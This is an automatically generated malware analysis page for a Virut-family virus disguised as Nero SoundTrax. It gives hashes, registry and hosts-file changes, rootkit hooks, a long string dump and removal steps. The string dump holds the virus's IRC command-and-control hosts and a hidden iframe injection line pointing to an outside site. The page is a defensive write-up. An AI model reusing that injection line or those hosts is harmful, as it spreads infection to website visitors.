Virus.Win32.Virut_73f3fd7f3e

by malwarelabrobot on December 15th, 2014 in Malware Descriptions.

HEUR:Virus.Win32.Generic (Kaspersky), Win32.Virtob.Gen.12 (B) (Emsisoft), Win32.Virtob.Gen.12 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, VirusVirut.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 73f3fd7f3eeb2b135074e0d7ecdc693d
SHA1: 1955bd018c6fbeff9cf09fa6502af8b14acfac30
SHA256: b1812a505078c13a4a52b640aadb5b14a10a0763d3637d33cb7c0388a4fac1c9
SSDeep: 49152:o34h4Hit9abab6uO7nMxXhittBQKDaPx:HaCt9wab6uMewQtx
Size: 1970264 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2006-07-19 20:57:24
Analyzed on: WindowsXP SP3 32-bit


Summary:

Virus. A program that recursively replicates a possibly evolved copy of itself.

Payload

No specific payload has been found.

Process activity

The Virus creates the following process(es):
No processes have been created.
The Virus injects its code into the following process(es):

%original file name%.exe:632

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

No files have been created.

Registry activity

The process %original file name%.exe:632 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 CF F5 5E CC 3F F3 99 F7 34 F2 A1 54 12 56 4F"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

The Virus modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 734 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 jL.chura.pl


Rootkit activity

The Virus installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile

Propagation

VersionInfo

Company Name: Nero AG
Product Name: Nero SoundTrax
Product Version: 1, 0, 0, 57
Legal Copyright: Copyright (c) 2003-2005 Nero AG and its licensors
Legal Trademarks: Nero SoundTrax
Original Filename: SoundTrax.exe
Internal Name: Nero SoundTrax
File Version: 1, 0, 0, 57
File Description: Nero SoundTrax
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 837382 839680 4.57129 3f16146e196b649565119cef26271a50
.rdata 843776 174752 176128 3.15883 9e59043f91d38c38a60b1cbb9edf0e1a
.data 1019904 107732 90112 3.92241 8f430fe818c75815e4dac0f783f2a04f
.rsrc 1130496 827392 827392 4.2641 fa86fa407ff76f7c115e734a88aafb02

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Virus connects to the servers at the folowing location(s):

%original file name%.exe_632:

.text
`.rdata
.data
.rsrc
tcSSSh
SSSh(ZM
t!SSSShP
SSSSh@
.tTPV
FTPjK
FtPj;
F.PjRWj
u.WWj
u.VVj
u$SShe
@u.Wj
G.UPj
SSSh$sM
CLSID\{436F4AD7-C95B-4d2f-B0F8-8DC643F7A200}
CHotKeyCtrl
msctls_hotkey32
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
%*.*f
GDI32.DLL
{X-X-X-XX-XXXXXX}
MSWHEEL_ROLLMSG
File%d
windows
CNotSupportedException
CTL3D32.DLL
MSH_SCROLL_LINES_MSG
ddeexec
%s\ShellNew
%s\DefaultIcon
%s\shell\printto\%s
%s\shell\print\%s
%s\shell\open\%s
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
portuguese-brazilian
ADVAPI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegEnumKeyA
SHFOLDER.dll
WINMM.dll
VERSION.dll
GetWindowsDirectoryA
WinExec
GetCPInfo
KERNEL32.dll
GetKeyState
EnumChildWindows
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
GetAsyncKeyState
CreateDialogIndirectParamA
USER32.dll
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GDI32.dll
comdlg32.dll
WINSPOOL.DRV
ShellExecuteA
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEPRO32.DLL
OLEAUT32.dll
SHDeleteKeyA
SHLWAPI.dll
Nero.txt
\track%d.wav
Server%d
/%s%d%s
DefExportFormat
%.2f %s
PlaylistImport
NWE.CMainFrm.PostCreate
ShowCmd
LastWindowState
nero.exe
Software\Microsoft\Windows\CurrentVersion\App Path
%s|*%s||
NewTake%d.wav
%d:d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NCoverEd.exe
nero.cdc
\NeroAPI.dll
NeroImportIsoTrack
NeroImportIsoTrackEx
NeroImportDataTrack
%d %s
%d%s %.2d%s
%d %.3d %.3d %.3d
%d %.3d %.3d
%d %.3d
%d%s %.2d%s:%.3d
%d - %s
%x-%x-%x-%x
ID:0x%lX Cmd: 0x%X
Hilfe-Symbol-Name: %s
Res-Symbol-Name: %s
%d.%d.%d.%d
.PAVCResourceException@@
..\..\NERO\hlp\Nero.hm
KERNEL32.DLL
shdocvw.dll
Portuguese(Brazil)
Portuguese (Brazil)
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese
SUBLANG_PORTUGUESE
LANG_PORTUGUESE
*.hlp
*.chm
eng.hlp
eng.chm
Requested:%d
Present:%d
UniTranslator dictionary file 1.0.0.1
UniTranslator dictionary file 1.0.0.0
NeASL.dll
\winhlp32.exe
There was not enough memory to complete the operation.
The operating system denied
The .EXE file is invalid
(non-Win32 .EXE or error in .EXE image).
The operating system is out
Serial6_%d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SetSecurityDescriptorDacl Error %u
InitializeSecurityDescriptor Error %u
LocalAlloc Error %u
SetEntriesInAcl Error %u
AllocateAndInitializeSid Error %u
Windows Media Player
NeroDigitalPro!UninstallKey
NeroMultiMounter!UninstallKey
NeroMediaHome!UninstallKey
SIPPSTAR-PBX!UninstallKey
NeroBackItUp!UninstallKey
NeroRecode!UninstallKey
NeroShowTime!UninstallKey
NeroNet!UninstallKey
NMIX!UninstallKey
NMPUninstallKey
InCD!UninstallKey
Nero - Burning Rom!UninstallKey
NeroVision!UninstallKey
SIPPS!UninstallKey
SpecialOffer.exe
mp3PRO.dll
NeroDigitalExt.dll
NeroBurnPlugin.dll
NeVCD.ax
NeNDMux.ax
NDParser.ax
NeroBurnRights.exe
NeAudioConv.ax
NeDVD.ax
Neroshx.dll
PackageCreator.exe
DiscAgent.exe
PhotoSnapViewer.exe
PhotoSnap.exe
DMAManager.exe
AdvrCntr.dll
SetupX.exe
Setup.exe
BurnSupportDisc.exe
NeroDigitalVideoEncoder.ax
NeroDigitalAudioEncoder.ax
NeNDAud.ax
Aac.dll
NeroMediaCon.dll
NeVCR.dll
NeVCR.ax
NeRecode.dll
NeACenc.dll
NeAudio.ax
NeNDVid.ax
NeMPG.ax
NeVideo.ax
ShortCut.dll
TestNeroLicense.exe
NeroStartSmart.exe
InfoTool.exe
DriveSpeed.exe
CDSpeed.exe
ImageDrive.exe
SoundTrax.exe
CentralAMSvc.exe
GatewaySvc.exe
RTPProxySvc.exe
wizardui.exe
configui.exe
sip_proxySvc.exe
phone.exe
BackItUp.exe
NeroNET.exe
NeroMediaPlayer.exe
CoverDes.exe
WaveEdit.exe
InCDL.exe
InCD.exe
nnservicectrl.exe
NMSTranscoder.exe
NeroMediaHome.exe
moviemk.exe
WINWORD.EXE
POWERPNT.EXE
OUTLOOK.EXE
EXCEL.EXE
wmplayer.exe
NeNDConv.exe
Nero.exe
Recode.exe
NeroVision.exe
ShowTime.exe
NeroMix.exe
NLDBV$Revision: 1.18.2.65 $
CLSID\{4EC0690F-EA6F-4573-845F-782AD19F35DB}\InprocServer32
LicenseKey
CLSID\{C46FF1FF-78EF-4939-8B00-46273B7B8EE1}\InprocServer32
Burlywood
#XXX
\VMPEG2Enc.dll
\DVDMPEG2Enc.dll
\..\Shared\AudioPlugins\aacmp32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\nero.exe
\aacmp32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NeroMediaPlayer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Nero.exe
NeMP3Enc.dll
6, 6, 0, 13
HMPITM.exe
ddddd
NeRSDB.dll
GetASPI32SupportInfo
WNASPI32.DLL
SetupAPI.dll
.?AVCCmdTarget@@
.?AVCHotKeyCtrl@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCArchiveException@@
.PAVCObject@@
.PAVCSimpleException@@
.?AVCStatusCmdUI@@
.?AVCToolCmdUI@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCFileException@@
.PAVCOleDispatchException@@
.PAVCOleException@@
zcÁ
c:\%original file name%.exe
[[[^^^```}}}
&&~%%{$/
.SHtR7
4441444
444\4443444
G..cmQQ
444\444!
444]444!
O..WkHH
444]444"
.dd\WMJ
.MMM00,
.MM00.
.JJ0.
444_4448444
444`4447444
444_4443444
4443444
=..|444&
4448444
?@-cfH}}X
gM5hI4R<(Q3#TB-W>.aC2XA1
eB"uN.jK-|U:P,
U0]7 mL-pI.pM0K.
a?gA#^<%dG(pH-hA*U7
K6#aG/^G.cC-T7"8)
eC.zT:xiJ
oUxXBoE.waC
nj.lT/H4
rA.rF0
tqQg8%sZ<
YA%S5
slOwE.aF,fZ>
t]=Ê)
nB-uF.cO2D5#0=`
{\eF.cI1
uK1mF.WD.?/
ztU=\<%s]A
o9#kD.UE.
{pdK/sS;qX>iN5sV=oO6iL5kN7mM5[D,x[BhK0_C)eJ0dH.dI**
rP.mB
aP0~fHoS=mH.qV:lK4j\:
zE.jS5
dD.pD,~]?6
K9$mP%s[$aB1~pQ
gItS6tX7z_>rR7tY:yV:jL4fI.rM1k3
bG.hL3qT;sY@hM4iK5lT6mO6gJ2rT5jL2gL0[D&
_A'_B%uV9oT7iM/oR5mW7nV9gN-kM1r\;pN3d'
bK {eDoH.kL0}
zI)}K uL-zQ.vP/|V3
~eJcJ.pX;nP7pR9pY:iS8qY:pX9kT7pS:lU4mS7nP4iP5eN2hL3jR6mU8iO3gL3gL2lL4hN5kQ6hJ1I2
nbD3nI.xW<
~_8(!< ".!
jU7xL.lN6
{dM5xK.rV:
hjj3zx>dZ0aN.mN1nE*xD b2 k;
1d%U~<~VP
es}EmxB`b7[K3`J.nY0aN!gR.dF V9
NKS(UN.YN-\M*VB
List of audio files to import. Click an audio file to highlight it.
Select the default file format that should be used when exporting audio files from SoundTrax.
Enter the directory where the exported tracks should be saved.
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
ADVAPI32.DLL
\RUNDLL32.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
irc.zief.pl
proxim.ircgalaxy.pl
NICK kefqbevr
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
?.chuu
windowsupdate
drweb
1, 0, 0, 57
{E6674EE4-57B1-42F2-A953-43705B992AD5}
{8352EDFE-28C3-4012-90BC-43B0AF7B7E57}
Default export file format:
Audio files to import:
{A8DC3A14-CBFC-4BE8-995D-2FDB6C7AA9F2}
{3CEC18D8-3C79-4570-82E6-81D54AB300C3}
{A7F78220-7648-4826-837B-6001E2AD7824}
Export CD Tracks to Audio Files
Export CD Tracks to Audio Files...
&Export to Audio File...
About %s
Version: %s
Name: %s
Company: %s
http://www.microsoft.com/windows/ie
Nero SoundTrax Project Files (*.npf)
SoundTrax.Project
Duration of object: %sTNero SoundTrax could not find any audio file filter plug-ins. Please reinstall Nero..Wave Files (*.wav)|*.wav|All Files (*.*)|*.*||
%d minutes
Transport Bar
%d hours
Track %d!Could not measure tempo of clips.TNero SoundTrax could not find any audio file filter plug-ins. Please reinstall Nero.&%s (Volume label: %s, File system: %s);An error occurred while trying to open the Nero Wave Editor
Unable to create file %s.
Track %d
Ready%Select an object on which to get Help
Help
Assignable Effect Group %dJThe selected item is not an assignable effect group and cannot be removed.
FX G%d!The two clips have the same tempo
Exporting
, %d%% done4NeroAPI was not able to open the selected CD device.
CD Track %d!There is no CD-RW in the recorder
CD Index %d,The selected recorder does not support CD-RW
%dx (%d KB per second)?The inserted CD-RW is not empty. Do you wish to erase the disc?%An error occurred while importing %s.MUnable to open the file %s which is referenced by the Nero SoundTrax project.
Burn CD.Change property settings of the selected track
%d:%.1d:%.3d
Track %d of %d
(fixed speed)IPlease insert a CDR or just click OK if you are using the Image Recorder./Image Files (*.nrg)|*.nrg|All Files (*.*)|*.*||
Use a linear crossfade function%Use an exponential crossfade function$Use a logarithmic crossfade function#Use a sinusoidal crossfade function
Pan (in %)4An error occurred while trying to access the NeroAPI1No compatible recorders were found on this system*Playlist File (*.pls; *.m3u)|*.pls;*.m3u||
All Files (*.*)|*.*|&Volume Slider (range -40 dB to  12 dB)/Pan Slider (range -100% = left to 100% = right)(Track Level Meter (range -60 dB to 0 dB)
Vol: %d dB
Pan: %d %%
Step %d of %d:
Grid line at each 8th triplet9Opens the effect chain editor for the master effect chain.The file is not a Nero SoundTrax project file.
Effect Files (*.eff)
EffectBrowser.Document
%d BPM
Creating peak file, %d%% done.
Play Looped
VThis operation will remove the content of the current project. Do you want to proceed?
Version %d.%d.%d.%d
Insert Audio File(s)ZThis operation deletes the track and its entire content. Are you sure you want to proceed?
Title: %s, Artist: %s
There are too many CD tracks in the project. The Audio CD standard does not support more than 98 CD tracks. Some CD tracks were truncated
Select the maximum noise level in pauses between tracks and the minimum length of pauses and tracks. Click "Detect" to scan the recording with new settings.vSet the length of the pause between tracks or the length of the overlap if you want tracks crossfaded into each other.lAdjust the level of noise reduction to what you find optimal. You can hear the result by clicking "preview".
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
#Unable to load mail system support.
%The help file cannot be opened: %1!s! No Help topic is associated with this item.PThe license you are currently using does not allow you to start this application
This version of the application cannot be run in this language. Please visit our Web site at www.nero.com to purchase an unlimited serial number.
Visit our support pages for more information about manuals and help files.

%original file name%.exe_632_rwx_005C8000_00005000:

ADVAPI32.DLL
\RUNDLL32.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
irc.zief.pl
proxim.ircgalaxy.pl
NICK kefqbevr
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
?.chuu
KERNEL32.DLL
windowsupdate
drweb


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  3. Delete the original Virus file.
  4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.